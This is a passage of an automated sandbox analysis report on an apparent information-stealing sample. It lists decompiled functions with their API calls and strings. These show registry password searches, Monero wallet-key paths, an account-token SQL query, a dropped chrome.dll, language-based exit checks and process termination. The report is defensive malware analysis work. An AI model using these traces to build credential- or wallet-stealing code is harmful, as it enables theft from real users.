Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: 93457871111a5313c1f7643ef20b04549e770dbc6ab280431a49153d10281b2d
Instruction ID: a4f56cfaded0b868399d5d9208ff4885bb71782624ee43d9ced828c7e101f409
Opcode Fuzzy Hash: 93457871111a5313c1f7643ef20b04549e770dbc6ab280431a49153d10281b2d
Instruction Fuzzy Hash: AA514FB1A00218ABDB20EF91CC45FEEB779AB44305F108099F705A72C1DB746B89DF95

Function 00D5012E Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00D5024D
___TypeMatch.LIBVCRUNTIME ref: 00D5035B
CatchIt.LIBVCRUNTIME ref: 00D503AC
CallUnexpected.LIBVCRUNTIME ref: 00D504C8

Strings

csm, xrefs: 00D50284
csm, xrefs: 00D5016B
csm, xrefs: 00D501D8

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2356445960-393685449
Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
Instruction ID: b4fc727b0fdbe08a26d89cc0528200ec590e1702169542124d6a830510a50b1f
Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
Instruction Fuzzy Hash: 58B17871801209EFCF25DFA4C8819AEBBB5FF14312F18816AED156B212D734DA59CBB1

Function 00CD7330 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00CD739A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00CD7411
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00CD746D
GetProcessHeap.KERNEL32(00000000,?), ref: 00CD74B2
HeapFree.KERNEL32(00000000), ref: 00CD74B9
task.LIBCPMTD ref: 00CD75B5

Strings

Password, xrefs: 00CD7461

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuetask
String ID: Password
API String ID: 775622407-3434357891
Opcode ID: 6c42d8c405a14fc0379b0c17a9f20643dc8e80c8c6241adf0c3d9ff496613fc4
Instruction ID: b4da1d063f9a24c666867899afcdefab4ad1770f6ec29d0d13df6916ea61b869
Opcode Fuzzy Hash: 6c42d8c405a14fc0379b0c17a9f20643dc8e80c8c6241adf0c3d9ff496613fc4
Instruction Fuzzy Hash: 1B610EB590416C9BDB24DB50DC55FD9B7B8BF44300F0082EAE649A6241EF70ABC9DFA1

Function 00CDBA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

Part of subcall function 00CEACC0: lstrlen.KERNEL32(?,01598830,?,\Monero\wallet.keys,00CF0E1A), ref: 00CEACD5
Part of subcall function 00CEACC0: lstrcpy.KERNEL32(00000000), ref: 00CEAD14
Part of subcall function 00CEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00CEAD22

Part of subcall function 00CEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00CEAC82
Part of subcall function 00CEAC30: lstrcat.KERNEL32(00000000), ref: 00CEAC92

Part of subcall function 00CEABB0: lstrcpy.KERNEL32(?,00CF0E1A), ref: 00CEAC15

Part of subcall function 00CEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00CEAAF6

lstrlen.KERNEL32(00000000), ref: 00CDBC6F

Part of subcall function 00CE8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CE8FE2

StrStrA.SHLWAPI(00000000,AccountId), ref: 00CDBC9D
lstrlen.KERNEL32(00000000), ref: 00CDBD75
lstrlen.KERNEL32(00000000), ref: 00CDBD89

Strings

AccountId, xrefs: 00CDBC94
SELECT service, encrypted_token FROM token_service, xrefs: 00CDBBBB
AccountTokens, xrefs: 00CDBB19
AccountTokens, xrefs: 00CDBA8A

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3073930149-1079375795
Opcode ID: 59bdb55eea5909f97814de7b240f62b9797964802278e45925aa1966c336b857
Instruction ID: f4b26731d78b0d471640f97141f577640fa6eb93b52b6dea866b3783a26dc76b
Opcode Fuzzy Hash: 59bdb55eea5909f97814de7b240f62b9797964802278e45925aa1966c336b857
Instruction Fuzzy Hash: E4B15C72D10248AFCB14FBA1CCA6EEE7339AF54300F5145A9F506621A1EF347B48DB62

Function 00CE6A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32 ref: 00CE6A14
ExitProcess.KERNEL32 ref: 00CE6A45
ExitProcess.KERNEL32 ref: 00CE6A4F
ExitProcess.KERNEL32 ref: 00CE6A59
ExitProcess.KERNEL32 ref: 00CE6A63
ExitProcess.KERNEL32 ref: 00CE6A6D

Strings

*, xrefs: 00CE6A2C

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: ea5cf86c039205b14e581af9da3a76661df189ef6a3d63b66f5916051fa3b39a
Instruction ID: 3eb69e4e94b2d6a2b872a616505a2adca0dd35adcd810739e8155f30770ae3da
Opcode Fuzzy Hash: ea5cf86c039205b14e581af9da3a76661df189ef6a3d63b66f5916051fa3b39a
Instruction Fuzzy Hash: B5F05E71E0C38DEFD344AFE0EC09B5CBBB0EB06747F1141A6F61996190C6705A50AB61

Function 00CE08A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

Part of subcall function 00CE9850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00CE08DC,C:\ProgramData\chrome.dll), ref: 00CE9871

Part of subcall function 00CDA090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00CDA098

StrCmpCA.SHLWAPI(00000000,01598930), ref: 00CE0922
StrCmpCA.SHLWAPI(00000000,015989B0), ref: 00CE0B79
StrCmpCA.SHLWAPI(00000000,01598820), ref: 00CE0A0C

Part of subcall function 00CEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00CEAAF6

DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00CE0C35

Strings

C:\ProgramData\chrome.dll, xrefs: 00CE0C30
C:\ProgramData\chrome.dll, xrefs: 00CE08CD

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$CreateDeleteLibraryLoad
String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
API String ID: 585553867-663540502
Opcode ID: c80a36578be47af9cf56c56da86a8fb1e3d5217d1adcc0cc07a77fd910451a82
Instruction ID: d139460ffdcd7588a7aaf8dbee2933c54c99ce7307ff58d1e26d37550ea16a29
Opcode Fuzzy Hash: c80a36578be47af9cf56c56da86a8fb1e3d5217d1adcc0cc07a77fd910451a82
Instruction Fuzzy Hash: DBA18771B002489FCB28FF65D992EAD7776EF95300F11816DE80A9F351DB30AA05DB92

Function 00CD9E30 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 163stringsleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00CE8CF0: GetSystemTime.KERNEL32(00CF0E1B,01599BB8,00CF05B6,?,?,00CD13F9,?,0000001A,00CF0E1B,00000000,?,01598830,?,\Monero\wallet.keys,00CF0E1A), ref: 00CE8D16

wsprintfA.USER32 ref: 00CD9E7F
lstrcat.KERNEL32(00000000,?), ref: 00CD9F03
lstrcat.KERNEL32(00000000,?), ref: 00CD9F17
lstrcat.KERNEL32(00000000,00CF12D8), ref: 00CD9F29
lstrcpy.KERNEL32(?,00000000), ref: 00CD9F7C
Sleep.KERNEL32(00001388), ref: 00CDA013

Part of subcall function 00CE99A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CE99C5
Part of subcall function 00CE99A0: Process32First.KERNEL32(00CDA056,00000128), ref: 00CE99D9
Part of subcall function 00CE99A0: Process32Next.KERNEL32(00CDA056,00000128), ref: 00CE99F2
Part of subcall function 00CE99A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CE9A4E
Part of subcall function 00CE99A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00CE9A6C
Part of subcall function 00CE99A0: CloseHandle.KERNEL32(00000000), ref: 00CE9A79
Part of subcall function 00CE99A0: CloseHandle.KERNEL32(00CDA056), ref: 00CE9A88

Strings

D, xrefs: 00CD9FA4

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
String ID: D
API String ID: 531068710-2746444292
Opcode ID: ec23bc8e76d72c2e08a11fe299f1bd982562ddf499f41b18210b200278e2e372
Instruction ID: 2ab78387ba04ff291c63685dd4e4ee11cf4c1996988dd24e807f706e2776d1f8
Opcode Fuzzy Hash: ec23bc8e76d72c2e08a11fe299f1bd982562ddf499f41b18210b200278e2e372
Instruction Fuzzy Hash: AE5188B5D44308ABDB24EBA0DC4AFDA7778AF44700F044598B60DAB2C1EB75AB84DF51

Function 00D4F9E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00D4FA1F
___except_validate_context_record.LIBVCRUNTIME ref: 00D4FA27
_ValidateLocalCookies.LIBCMT ref: 00D4FAB0
__IsNonwritableInCurrentImage.LIBCMT ref: 00D4FADB
_ValidateLocalCookies.LIBCMT ref: 00D4FB30

Strings

csm, xrefs: 00D4FAC5

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
Instruction ID: 7663e7ccdedc23c69a84b06d2c4d501894150c199b1c74534b703fd221627db1
Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
Instruction Fuzzy Hash: 78416035A00219EBCF10DF68C885A9EBBA5EF49314F188165ED19AB3A2D731D905CBB1

Function 00CD5000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00CD501A
RtlAllocateHeap.NTDLL(00000000), ref: 00CD5021
InternetOpenA.WININET(00CF0DE3,00000000,00000000,00000000,00000000), ref: 00CD503A
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00CD5061
InternetReadFile.WININET(?,?,00000400,00000000), ref: 00CD5091
InternetCloseHandle.WININET(?), ref: 00CD5109
InternetCloseHandle.WININET(?), ref: 00CD5116

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: 83733f63a520e004c42ba9ebd01a3a517089bc2c7197e9c082aacf3f699df148
Instruction ID: 51c98de31828be8ec990b9f09c854f156a55eeb66510f66b8103dc0773ca1dc1
Opcode Fuzzy Hash: 83733f63a520e004c42ba9ebd01a3a517089bc2c7197e9c082aacf3f699df148
Instruction Fuzzy Hash: 9F31F5F5A4421CABDB20DF54DC85BDDB7B4AB48304F1081D9FB09A7281D7706AC59F98

Function 00CE856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00CE85B6
wsprintfA.USER32 ref: 00CE85E9
RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00CE860B
RegCloseKey.ADVAPI32(00000000), ref: 00CE861C
RegCloseKey.ADVAPI32(00000000), ref: 00CE8629

Part of subcall function 00CEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00CEAAF6

RegQueryValueExA.ADVAPI32(00000000,0159DC38,00000000,000F003F,?,00000400), ref: 00CE867C
lstrlen.KERNEL32(?), ref: 00CE8691
RegQueryValueExA.ADVAPI32(00000000,0159DC68,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00CF0B3C), ref: 00CE8729
RegCloseKey.ADVAPI32(00000000), ref: 00CE8798
RegCloseKey.ADVAPI32(00000000), ref: 00CE87AA

Strings

%s\%s, xrefs: 00CE85DD

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
